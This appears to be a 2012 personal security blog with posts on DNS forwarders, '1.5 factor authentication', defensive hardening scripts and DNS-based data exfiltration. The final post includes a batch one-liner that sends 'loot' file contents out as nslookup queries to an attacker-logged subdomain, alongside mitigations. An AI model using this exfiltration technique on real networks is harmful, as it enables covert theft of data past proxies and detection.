Wednesday, 5 December 2012

DNS relay servers

This one may be boring security for some, but a lot of people I meet who claim to be in security forget the very important, possibly critical, CIA model of security. No, I don't mean the Central Intelligence Agency; I mean Confidentiality, Integrity and Availability. These three things are the key to good security infrastructure, and DNS is part of at least the last two.

Generally speaking, if you are a small to medium business you will have a DNS server in your environment. You could just leave it at the default, resolving external names for your clients via the root servers, but in geographically dispersed countries like Australia that can lead to resolution failures due to the latency to the root servers that is sometimes experienced. If you have a big enough pipe this latency is manageable and won't cause an issue, though a bit of contention can begin to cause problems. My suggestion was usually to specify DNS relay (forwarder) servers. This lets you relay your requests to your ISP, which is especially good if your ISP blocks lookups to the root servers, which I have also seen. But should you just specify your ISP's DNS? Well, when I first started doing this, that is what I did. Until the ISP the client was using had their DNS cache poisoned and a few popular sites started resolving badly, and other times the ISP's DNS failed or changed without notice.
So I started setting a second or third forwarder that was with a different ISP but known to be publicly accessible, either Optus or Telstra, as they are/were the biggest ISPs in Australia at the time. I eventually added OpenDNS and Google's DNS to my repertoire, especially OpenDNS's premium services for clients that wanted the blocking a proxy gives without the infrastructure or upfront cost. Yes, I know you can get around it by simply knowing the IP of a malicious site, but it was better than an unencumbered internet feed. I am not a shill; I don't even have an OpenDNS account anymore.
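If you run the Windows DNS server, the forwarder list is scriptable too. A hedged sketch (the first address is a placeholder for your ISP's resolver; run it on the DNS server itself);
rem hypothetical example: forward to the ISP's resolver first, with Google DNS as a fallback
dnscmd /ResetForwarders 203.0.113.53 8.8.8.8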

This worked very well. But just today, while troubleshooting an issue, I fired up WinMTR, a Windows port of the Linux tool MTR (My Traceroute), which is very useful for finding a hop in your route that is having issues. As usual I used the memorised Optus and Telstra DNS servers to check my routes, and I found packet loss (there was an issue with my ISP's bridging router into PIPE, it seemed). Then I tested to my ISP's DNS: all good, no packets dropped and only 4 hops. Then I thought, hmm, I should test to Google's public DNS servers, just to see;
WinMTR statistics
Host                                   | Loss % | Sent | Recv | Best | Avrg | Wrst | Last
x-x-x-x.tpgi.com.au                    |      0 |   55 |   55 |    1 |    3 |   81 |    4
x.x.x-x.tpgi.com.au                    |      2 |   55 |   54 |   23 |   28 |  114 |   24
syd-nxg-men-crt2-ge-3-1-0.tpgi.com.au  |      0 |   55 |   55 |   48 |   69 |  159 |   67
202.7.171.46                           |      0 |   55 |   55 |   25 |   33 |  124 |   28
72.14.237.21                           |      4 |   55 |   53 |   26 |   28 |   43 |   32
google-public-dns-a.google.com         |      2 |   54 |   53 |   44 |   70 |  151 |   76
WinMTR - 0.8. Copyleft @2000-2002 Vasile Laurentiu Stanimir (stanimir@cr.nivis.com)

Yeah, there is a little packet loss there (the issues with my connection), but only 6 hops is impressive. It wasn't this way when Google DNS first started; I remember using it early on and seeing latency of 100+ ms and about 10-15 hops. Then I quickly realised: of course, they are Google, they are now using anycast. A quick traceroute from elsewhere in the world (thanks to CentralOps' tools) confirmed this due to the different route (more hops, lower response time, but the first 5 are internal);
Hop  RTT1  RTT2  RTT3  IP               Hostname
 1     1     1     1   70.84.211.97     61.d3.5446.static.theplanet.com
 2     0     0     0   70.87.254.1      po101.dsr01.dllstx5.networklayer.com
 3     0     0     0   70.85.127.105    po51.dsr01.dllstx3.networklayer.com
 4     2     0     0   173.192.18.228   ae16.bbr02.eq01.dal03.networklayer.com
 5     0     0     0   173.192.18.208   ae7.bbr01.eq01.dal03.networklayer.com
 6     0     0     0   50.97.16.37
 7     1     0     0   72.14.233.77
 8     1     1     0   72.14.237.219
 9     7     7     7   216.239.47.121
10     7     7     7   216.239.46.59
11     *     *     *
12     7     7     7   8.8.8.8          google-public-dns-a.google.com


So, the moral of the story: if, like me, you are using one of the aforementioned external DNS servers instead of, or in addition to, your ISP's, now is a good time to move to Google's DNS, as it is probably faster than everyone else bar your ISP, and gives you a bit of redundancy. As one of my colleagues used to joke, if Google is down, the internet is down.
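If you want a rough-and-ready comparison before switching, ping round-trip time to each candidate resolver is a fair first-order proxy for lookup latency. A hedged sketch (the first address is a placeholder for your ISP's resolver, and some resolvers deprioritise ICMP, so treat the numbers as indicative only);
rem compare round trips to your ISP's DNS, OpenDNS and Google DNS
for %%s in (203.0.113.53 208.67.222.222 8.8.8.8) do ping -n 5 %%s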
I did read something interesting in my travels researching this: geographically aware DNS (aka GeoDNS); there is a patch for BIND and a fork of djbdns here; http://geoipdns.org/. Interesting; it is similar to an idea I discussed with a colleague a few years ago and tested implementing in a kludgy way with Microsoft's DNS server. This implementation is a lot smoother, however.

Oh and there is an update to my previous post on 1.5 factor auth.

Tuesday, 13 November 2012

"1.5 factor authentication"?

A colleague recently tried to convince me that "1.5 factor authentication" was better than 1 factor, so I decided to look into it.

First, some basics. Generally speaking, authentication works at its most basic level on computer systems via a username and password. This is 1-factor authentication: something that is unprotected and possibly public (your username) paired with something that should be kept hidden and secret (your password or passphrase), i.e. one something-you-know.
The 2nd factor in 2-factor authentication is the addition of something you have: some kind of cryptographic token (USB key, RFID token, smart card, or a numeric/alphanumeric code generator, a la RSA SecurID and WiKID soft tokens).
The 3rd factor of authentication is newer, but it requires the first two in addition to another: something you are, e.g. a thumbprint, voice print, etc. Basically the 3rd factor is the addition of biometrics. I am really not a fan of biometrics as the only method of authentication, as you can reissue a security token but you can't reissue your thumb. I can see that having it in addition would be workable, though.

See here for a more in-depth PCI view of these three widely accepted Authentication factors; http://pciguru.wordpress.com/2010/05/01/one-two-and-three-factor-authentication/

There is also a not yet well supported but interesting idea for a 4th factor: in addition to all the other factors, the computer or website or what-have-you authenticates that you are where you say you are. This 4th factor is hard to implement at the moment, and they are obviously trying to make it transparent to the end user; so, say, you have an app on your phone that fires up GPS and sends your position through, to ensure you are logging in from areas you have pre-defined. I actually heard of someone using log correlation to this effect years ago: basically they watched logins from the internal network and the VPN concentrators, and if a user attempted to VPN in from a geographically remote IP when they had only recently been seen somewhere geographically local, or even on the network, they would shut down the remote session. I can't find the article now, but this supposedly shut down a hacker trying to get into a USA-based company, using an exec's credentials via the VPN from South America, when the exec had been seen on the local network only minutes earlier.
See here for more on 4th factor; http://blog.dustintrammell.com/2008/11/21/four-factor-authentication/

Now to get to 1.5 factor auth. I couldn't find much;
Market-speak; http://blog.mailchimp.com/introducing-alterego-1-5-factor-authentication-for-web-apps/
Comment decrying it for being touted as 2 factor auth; http://stackoverflow.com/questions/559639/what-is-two-factor-authentication
Market-speak, but interesting implementation; http://pingrid.org/
Very aptly named blog; http://www.ryanhicks.net/blog/2008/10/15-factor-authentication.html
But onto this colleague's definition: 1.5 factor auth is a password and a PIN... so, still two things that you know. Yes, it may be prettied up, as in the case of PINgrid, or horrible and easy to break, as in the case of the below screenshot from a banking institution here in Australia that I used to use; but it is still two somethings-you-know, which by definition is still one factor, as per the definitions of factors above.

Onto the example I mentioned earlier. I used to use a financial institution that I believe started using the below "extra factor" in 2003 (this is a mock-up; I no longer have an account there). I laughed when I first saw it, realising it added no real security. The idea is that you pick three images and you have to click them in order; the images get shuffled on each login.
As I watched over more logins I noticed that the pictures changed every time, except the pictures I as a user had to click. So if someone had my username and password they could simply log in several times, view the picture step, note down the pictures shown, then exit; do this a large enough number of times and, like a game of "Guess Who", you have narrowed it down to the three pictures that persist across logins. As there are only three and you need to click them in order, there are only 3! = 6 possible orderings, so at most 6 attempts and you will have it.

The problem with this 1.5 factor is that, depending on the implementation, it could be almost 50% more security than 1 factor, but in the case of the above image it is probably more like 1.0000000000000001 factors. The other issue is that even if it is 50% better than 1 factor, that does not make it only 50% worse than 2 factor: 2 factor is insanely better than 1 factor. It comes back to implementation of course, but even the worst 2-factor scheme is orders of magnitude better. Have a look at how complex PINgrid is: I doubt most end users would pick it up quickly, and I would say 90% will write down what they have to do, and what they actually do, to get authenticated. That makes it no longer something that is kept secret, and may make authentication so hard for legitimate users that they fail more often, causing increased support calls and decreased productivity.

This half-factor addition is bad market-speak at best, and at worst a false sense of security that moves towards introducing vulnerabilities into the authentication chain.

UPDATE: Being the security geek I am, I decided to email the venerable Bruce Schneier, and his word from on high matches my own: "It doesn't (add security). It's a marketing ploy." Squeee, I got a reply from Bruce Schneier... but yeah, 1.5 factor is BS; coffin closed and put to bed.

Tuesday, 11 September 2012

Securing your environment



So a recent risky.biz podcast (ep 252, here; http://risky.biz/RB252) prompted me to write this.
The host Patrick Gray, Adam Boileau, and later HD Moore were talking about the recent mass ownage of 30,000 workstations at Aramco. Ouchies. Some of the things that were mentioned I have done before, so I thought I would get them out there;

First up, administrative group monitoring in a Windows domain: trivially easy, and it should take 15 minutes at most to set up.

On one of your DCs, create a group-audit.vbs file as below:

' This script recursively enumerates the members of a group
sLDAPPath = WScript.Arguments.Item(0)
'wscript.echo sLDAPPath

strTargetGroupDN = "LDAP://" & sLDAPPath
EnumNestedGroup strTargetGroupDN

' Recurse into nested groups; print users as "display name ; mail"
Function EnumNestedGroup(strGroupDN)
    Set objGroup = GetObject(strGroupDN)
    For Each objMember In objGroup.Members
        If (LCase(objMember.Class) = "group") Then
            WScript.Echo objMember.AdsPath
            EnumNestedGroup objMember.AdsPath
        Else
            WScript.Echo objMember.DisplayName & " ; " & objMember.Mail
        End If
    Next
    Set objGroup = Nothing
End Function

Then in a batch file, run the below for each group you want to monitor (by CN; I suggest Domain Admins, Administrators, Enterprise Admins, Schema Admins and any other privileged group), each with a different log file at the end. Then just diff the logs at the end of the script and email (blat is your friend) if there are any differences.
cscript //nologo C:\scripts\group-audit.vbs "CN=Administrators,CN=Builtin,DC=DOMAIN,DC=TLD" > C:\scripts\administrators.log
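That last diff-and-email step might look something like the below (a hedged sketch; the old-log path, recipient and SMTP server are placeholders, and I am assuming blat's usual flags; fc sets errorlevel 1 when the files differ);
rem compare today's dump against the previous run and mail the changes, if any
fc C:\scripts\administrators.log C:\scripts\old\administrators.log > C:\scripts\changes.txt
if errorlevel 1 blat C:\scripts\changes.txt -to security@DOMAIN.TLD -s "Privileged group membership changed" -server smtp.DOMAIN.TLD
copy /y C:\scripts\administrators.log C:\scripts\old\administrators.log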

Sudoers/root group monitoring for Linux;
Similar to our Windows script: run the below, depending on the groups you need to monitor, then diff the results against the previous run and pipe out to email. If you don't have getent, use grep ^GROUPNAME /etc/group instead. Then just call sendemail (the Linux equivalent of blat) at the end if there is a difference;
# rotate the previous snapshots
mv /root/logs/sudoers.log /root/logs/old/
mv /root/logs/root.log /root/logs/old/
# dump the current group membership
getent group sudoers > /root/logs/sudoers.log
getent group root > /root/logs/root.log
# diff exits non-zero on change; hang your sendemail call off that
diff /root/logs/sudoers.log /root/logs/old/sudoers.log
diff /root/logs/root.log /root/logs/old/root.log

Inactive account checking, and, if you're really harsh, disabling, in Windows;
The 12 below is the number of weeks to look back. This is not foolproof; sometimes accounts will show up that have been active more recently. It is also a good idea to have a "Disabled Accounts" OU to move them into, and to exclude it from the query as below;
dsquery user -inactive 12 -limit 0 |find /v "OU=Disabled Accounts" |find /v "OU=ANY OU YOU WANT TO IGNORE" > c:\scripts\inactive.txt
rem this is the disable-and-move part; remove the double % if not run inside a batch script. Hope you don't have # in your usernames too :)
for /f "delims=#" %%a in ('type c:\scripts\inactive.txt') do (
    dsmod user %%a -disabled yes
    dsmove %%a -newparent "OU=Disabled Accounts,DC=DOMAIN,DC=TLD"
)

SSH monitoring for Linux: Fail2Ban or DenyHosts. Use one or the other; love it.

Different local admin passwords per computer. This idea came from a colleague who worked at a big multinational and said they had it as a standard; very cool idea. This will stop viruses and worms that simply learn the local admin password and then propagate via admin$ shares wherever they can. It won't stop a committed attacker, who will probably work out the system (you can increase the password length by increasing the 15 in the set finalpass line; heck, even do a second, different MD5 of something). This should be put in a batch file that is then set via scheduled task to run at midnight; you can go even further and have it run hourly by extending the thedate variable;

rem grab the locale-dependent date portion of %date% (e.g. dd/mm/yyyy)
set thedate=%date:~4,10%
set passphrase="PASSWORD HERE"
rem hash hostname + secret + date (slashes swapped for dashes) to derive today's password
for /f %%a in ('c:\stat\md5.exe -d%computername%%passphrase%%thedate:/=-%') do set pass=%%a
rem keep the first 15 characters of the hash
set finalpass=%pass:~0,15%

net user LOCALADMIN %finalpass%

Then to retrieve a computer's password, simply run the below batch file. Obviously protect the passphrase and the retrieval batch file somehow; and if just anyone can read the script on the local PC then they can see how the password is derived, so lock it down with permissions;

rem thedate and passphrase must be set exactly as in the scheduled task's script
set thedate=%date:~4,10%
set passphrase="PASSWORD HERE"
set /p computer="Enter computer hostname: " %=%
for /f %%a in ('c:\stat\md5.exe -d%computer%%passphrase%%thedate:/=-%') do set pass=%%a
echo %pass:~0,15%

Workstation and server hardening.
This is a massive topic that people have written hundreds of volumes on, but really: keep all your stuff up to date and look at what lockdown features are in your OS. Obviously easier said than done, otherwise something like 80% of breaches wouldn't occur.
For network lockdown in Windows there are the Windows Firewall, IP filtering (Windows 2003 only), and IPsec policy, all of which can easily lock down ports and applications.
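Those Windows Firewall rules are scriptable via the built-in netsh interface (Vista/2008 and later). A hedged sketch; the rule name, port and management subnet are placeholders;
rem hypothetical example: default-deny inbound, then allow only what is needed
netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound
netsh advfirewall firewall add rule name="Allow RDP from mgmt" dir=in action=allow protocol=TCP localport=3389 remoteip=10.0.0.0/24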
On Linux there is iptables, which is easy enough to use; see here for a quick guide; http://richmorrison.net/?p=36

Generally speaking you limit the number of local admins/superusers on any OS, so monitor this too. Monitor your important groups; heck, on a Windows workstation the below will do the trick;
net localgroup administrators > c:\scripts\local-admin.log
then diff it against last time and alert on any difference (the same fc-and-blat trick from the group audit above does the job).

AV is dead, and so is blacklisting. Sure, keep AV running to protect any systems that don't have your kick-ass whitelisting enabled. Use something simple; Clam is my favourite for simple, effective AV, and it's cross-platform too. On Windows you probably need more, depending on what the machine is used for and your budget. I am generally pretty loath to put more and more agents on servers, as one will always eventually cause a crash, so they really have to add value on an immense scale for me to say OK.
For filesystem and application lockdown in Windows there are Software Restriction Policies (SRP) and AppLocker, which from my playing around looks like a gussied-up version of SRP. If you have AppLocker, I would suggest using it to whitelist a clean system and then block everything else; you are pretty safe for the time being. I can't find any info on the hash AppLocker uses, but even if it is MD5, the chance that some random attacking your server/PC can generate an exe carrying their payload that has a hash collision with an existing file is pretty small. Of course, if you choose to allow signed exes, then some of the more recent, possibly state-sponsored malware that comes signed will still get you; but then you could just hash your whole clean system and be pretty damn safe.
If you are stuck on an older system with just SRP you can still hash your files; heck, you can use something like md5deep or sha1deep to get all the hashes you need and script the creation of your rules, or just compare the hashes later as a form of poor man's Tripwire.
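A hedged sketch of that poor man's Tripwire (paths are placeholders); md5deep records a baseline recursively, and its negative-match mode later prints anything that no longer matches;
rem baseline a known-clean tree
md5deep -r "C:\Program Files" > c:\scripts\baseline.md5
rem later: -x prints files whose hashes are NOT in the baseline (new or modified)
md5deep -r -x c:\scripts\baseline.md5 "C:\Program Files"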
On Linux you have AppArmor and SELinux. I prefer SELinux's approach, but AppArmor is much easier to configure without breaking things. It is horses for courses, but whichever way you go, I recommend you don't stick with the distro's rather relaxed defaults.
There are guides out there for SRP, SELinux and AppArmor, so I am not going to reproduce them; go google. Another one I didn't mention, as I have yet to have a decent play with it, is El Jefe (http://www.immunityinc.com/products-eljefe.shtml), which, although being another agent, does live process monitoring and trending, which is pretty cool.

Network segregation; really, that is it. Segregate your servers based on what they do and limit communication between them with a firewall. Easy to do: get IPCop or Smoothwall if you have no cash. Think: does this device really need to talk to that device? If no, then why can it?

This is all simpler said than done, but there you have it: just a quick dump of protections that I have used and would recommend. Some of these you can get in with no pain. This was meant to be a quick few scripts I have written over the years, but it ended up a diatribe against add-ons and a spruik of built-in features... Ah well, I hope it is of use to someone.

Thursday, 19 January 2012

Easy data exfiltration

I had this thought last night as I was falling asleep, and I realise it has probably already been talked about, but I will explain how easy it is to do and how hard it is for existing detections to catch.
So my idea is basic data exfiltration via DNS lookups. Say you are sitting on an internal machine, logged on as a local user through some exploit, boot disk or whatnot. You probably don't have internet access, you can't install a tunnelling tool, and you don't want to set off the machine's HIDS by plugging in an unknown USB stick. So what do you do?
Well, suppose you already have a DNS server running on a box you control, pre-set up for something like DNS tunnelling, or just legitimately resolving your own domains. On that server, turn on verbose logging for one of your subdomains; this is pretty easy to do in BIND or even in Windows' DNS server. Then simply encode the data on the local machine any way you want, or if you can't encode it, don't, and just do an nslookup data.sub.mydomain.com. Bear in mind the whole lookup can't be longer than 255 characters and each label can be 63 characters tops; if you need special characters you will need to either encode in Base32 or use some system in your head. Every lookup that gets forwarded out then lands in your server's logs.
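A minimal sketch of the unencoded variant, assuming the loot is already split into DNS-safe tokens of 63 characters or less, one per line in a hypothetical c:\temp\loot.txt, and that sub.mydomain.com is the verbosely logged zone;
rem hypothetical example: one lookup per token; each query lands in the attacker's DNS logs
for /f %%a in (c:\temp\loot.txt) do nslookup %%a.sub.mydomain.com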

Mitigation: do your client machines really need to resolve every external site? Surely they are going through a proxy or application-aware firewall that can do the DNS lookups for them. The issue, of course, is that most networks now use DNS to resolve internal services; usually the DNS servers that service those requests are allowed to reach the internet in some way, and the proxies or firewalls refer back to these internal DNS servers, as they also point to resources the proxies need, like authentication. The only suggestion then is to split your DNS infrastructure more finely: specific DNS servers that are allowed to do lookups against both the internal DNS servers and the wider internet, with the proxy server the only internal device allowed to reach them. Of course, depending on how your proxy works, it may not wait for the client to be authenticated before it does a lookup, so the lookups could simply be proxied through the compromised machine's web browser that is connected to the proxy.

Feel like donating to me? Bitcoin; 1BASSxgFZ2j8VfXFrWJHNvYdQXDtJKAUuN or Ethereum; 0x2887D4B4fe1a7162D260CeA7E1131AF8926bd87F